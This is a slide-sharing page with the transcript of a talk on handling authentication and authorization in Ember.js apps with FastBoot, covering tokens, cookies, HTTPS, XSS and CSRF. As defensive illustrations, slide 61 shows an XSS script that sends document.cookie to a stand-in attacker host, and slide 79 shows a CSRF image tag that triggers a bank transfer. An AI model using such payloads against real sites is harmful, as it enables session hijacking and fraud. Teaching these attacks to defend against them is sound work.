Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Auth* with FastBoot

3179e6bb62dc91d29bb906ffef4fa2d4?s=47 Marco Otte-Witte
July 12, 2016
Technology
2
740

Auth* with FastBoot

An overview of handling authentication and authorization in Ember.js app and Fastboot

3179e6bb62dc91d29bb906ffef4fa2d4?s=128

Marco Otte-Witte

July 12, 2016
Tweet

More Decks by Marco Otte-Witte

See All by Marco Otte-Witte
Handling images on the web
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
0
310
SSR, SPAs and PWAs
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
0
310
Fast, Fast, Fast
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
2
300
Feel the Glimmer - ParisJS
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
1
350
Feel the Glimmer - MunichJS 11/17
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
0
100
The JSON:API spec
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
3
1.3k
Leveraging the complete Ember Toolbelt
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
0
150
Feel the Glimmer
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
1
200
Templates and Logic in Ember
3179e6bb62dc91d29bb906ffef4fa2d4?s=48 marcoow
0
400

Other Decks in Technology

See All in Technology
Citizen 개발기
748a6dc8b4eaba0fde62909e39be7987?s=48 outsider
0
210
OpsJAWS Meetup21 システム運用アンチパターンのすすめ
96c31fe94f5e9b0eef4a606eaadcbc04?s=48 yoshiiryo1
0
1.4k
Persistence in Serverless Applications - ServerlessDays NYC
Fd55de4174accaf3b4f030e43a8a70c6?s=48 marcduiker
0
230
リファインメントは楽しいかね?
F4ea0f5f6211de72f79576d020308de5?s=48 kitamu_mu
1
400
オンラインでのサーバー切替事例紹介/ColoplTech-05-01
E704514df1d69d511c4c74771a40c8f5?s=48 colopl
0
200
スタートアップと技術選定と AWS
Bf5ee9059859ed5d855b5ff4680e63e2?s=48 track3jyo
PRO
2
330
RDRA + JavaによるレジャーSaaSプロダクトの要件定義と実装のシームレスな接続
050b8cdbe92809580ed71d0d0d327e36?s=48 jjebejj
PRO
3
520
GeoLocationAnchor and MKTileOverlay
61a68b2172503ecdf7a7f7757df56071?s=48 toyship
0
110
アジャイル推進活動におけるBeAgileへの変化の兆し/Signs_of_Change_to_"Be_Agile"_in_Agile_Promotion_Activities
88892f20b802d5a732b7c16ce40528f0?s=48 m_iyama
0
170
UWBを使ってみた
8b0e9a3684bd29ecece29db2582e38ae?s=48 norioikedo
0
400
サイボウズの アジャイル・クオリティ / Agile Quality at Cybozu
A97eee01397705443a72a48ce29d3e19?s=48 cybozuinsideout
PRO
4
2.2k
Camp Digital 2022: tailored advice
8fadc4cc83e533c19a6d13db9d46cb3e?s=48 kyliehavelock
0
140

Featured

See All Featured
Clear Off the Table
Ef32e0b1ac5082450dc8c1fca3a26b5c?s=48 cherdarchuk
79
280k
Distributed Sagas: A Protocol for Coordinating Microservices
9128d500301ae51524e887bb680f471d?s=48 caitiem20
315
19k
Art, The Web, and Tiny UX
D67fff74178013024d833b3eec6cf27f?s=48 lynnandtonic
280
17k
Designing for humans not robots
D36d2c1821af9249b69ff7f5ed60529b?s=48 tammielis
241
23k
Visualization
170b760e0147792d0140e59ec78e9893?s=48 eitanlees
124
11k
Product Roadmaps are Hard
7cbd3f5f922d798cc312eaf596de7ae6?s=48 iamctodd
34
6.5k
Art Directing for the Web. Five minutes with CSS Template Areas
433acaea1012b25d97ae66da9b998dad?s=48 malarkey
196
9.4k
The MySQL Ecosystem @ GitHub 2015
Be9caeb9d4ef9944d151af909063ed6e?s=48 samlambert
238
11k
How STYLIGHT went responsive
F716e5f737fcfb03f2cf8d1a184f1dbe?s=48 nonsquared
85
3.9k
Robots, Beer and Maslow
9375a9529679f1b42b567a640d775e7d?s=48 schacon
152
7.1k
Web development in the modern age
465724d73fe3a92c0879fdfb43a3a6f3?s=48 philhawksworth
197
9.3k
Facilitating Awesome Meetings
245cee81a9c424266e5e401d844ea881?s=48 lara
29
4k

Transcript

  1. Auth* with FastBoot

  2. Marco Otte-Witte @marcoow

  3. https://simplabs.com @simplabs

  4. None

  5. https://ember-workshop.simplabs.com

  6. Auth* in Ember

  7. Authentication is verifying the identify of a user

  8. Authorization is verifying permissions of an (authenticated) user

  9. in an Ember app, you cannot actually do any of

    these

  10. $E.set('isAuthenticated', true)

  11. $E.set('isAdmin', true)

  12. actual authentication and authorization happens on the API server

  13. authorization in the Ember app itself is only about presenting

    a consistent UI

  14. The Status Quo is using token based authorization

  15. the token is issued by the API server upon authentication

    and then injected into subsequent (Ember Data) requests

  16. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  17. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  18. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  19. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  20. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  21. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  22. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  23. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token>

  24. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token> <token>

  25. None

  26. "progressive enhancement for ambitious web apps"

  27. FastBoot performs the initial render on the server, reducing the

    time until the user sees content

  28. after the JavaScript has downloaded, the Ember app takes over

  29. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  30. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com

  31. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token>

  32. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token>

  33. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token>

  34. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token>

  35. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token> <token>

  36. A floating session ensures a singular execution context in the

    browser as well as in FastBoot

  37. it turns out we've had the mechanism for that since

    1997

  38. http://www.discoversmithsfalls.ca/wp-content/uploads/2014/12/mm_cookie.jpg

  39. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token> <token>

  40. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.app.com <token> <token>

  41. None
  42. None
  43. None

  44. there's no document.cookie in Node.js

  45. ember install ember-cookies https://github.com/simplabs/ember-cookies

  46. Demo https://github.com/marcoow/fastboot-auth-example

  47. Security Concerns

  48. everyone with access to a user's token can impersonate as

    that user

  49. Authorization: Bearer vsret63refrwtu9

  50. Authorization: Bearer vsret63refrwtu9

  51. use HTTPs so that the token is not sent as

    clear text!

  52. Authorzation: Bearer 4t4hw4et

  53. make sure your HTTPs is setup correctly

  54. HSTS, TLS 1.1/1.2, PFS, ephemeral Diffie Hellmann key exchange, etc.

  55. validate your HTTPS setup https://www.ssllabs.com/ssltest/

  56. None

  57. http://redpowerstation.co.uk/wp-content/uploads/2013/03/image.jpg https://www.python.org/m/psf/fastly.png

  58. XSS a web developer's worst nightmare

  59. someone gets to execute their (malicious) JavaScripts in the context

    of your app

  60. <h2> Hello, {{{user.name}}} </h2>

  61. <h2> Hello, <script>$.ajax('http://bad.ru?cookie=' + document.cookie)</script> </h2>

  62. use {{…}}, not {{{…}}}

  63. don't use htmlSafe on user entered content

  64. enable CSP https://github.com/rwjblue/ember-cli-content-security-policy

  65. what if JavaScript had no access to the cookie holding

    the token in the first place?

  66. An alternative approach using token based authorization via a HttpOnly

    cookie

  67. https://design.google.com/icons/ https://design.google.com/icons/ app.com app.com/api

  68. https://design.google.com/icons/ https://design.google.com/icons/ app.com app.com/api

  69. https://design.google.com/icons/ https://design.google.com/icons/ app.com app.com/api

  70. https://design.google.com/icons/ https://design.google.com/icons/ app.com app.com/api

  71. https://design.google.com/icons/ https://design.google.com/icons/ app.com app.com/api

  72. this has implications on your domain setup

  73. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.com

  74. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.com X

  75. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.com X X

  76. https://design.google.com/icons/ https://design.google.com/icons/ app.com api.com X X X

  77. Demo https://github.com/marcoow/fastboot-auth-example/tree/cookie-based

  78. CSRF makes users initiate requests without their consent or knowledge

  79. <img src="http://bank.com/transfers-money?amount=1mio&to=attacker"/>

  80. None

  81. when using the Authorization header for authorizing API requests, CSRF

    doesn't work

  82. when using a cookie for authorizing API requests, you're vulnerable

    to CSRF attacks

  83. CSRF results in GET requests which should not modify anything

    on the API

  84. an attacker could initiate requests to the FastBoot server

  85. FastBoot only pre-renders though, does not execute actions etc.

  86. do not perform anything potentially unsafe in beforeModel, model, afterModel

    etc.

  87. do not perform anything potentially unsafe in beforeModel, model, afterModel

    etc. (you probable don't anyways)

  88. Wrapping up

  89. Use token based authorization

  90. use a cookie to transparently move authentication state and authorization

    info between the browser and FastBoot

  91. …and make sure you're safe

  92. you could implement all these things yourself…

  93. None

  94. 1.2 is going to support FastBoot out of the box

  95. Thanks

  96. http://simplabs.com @simplabs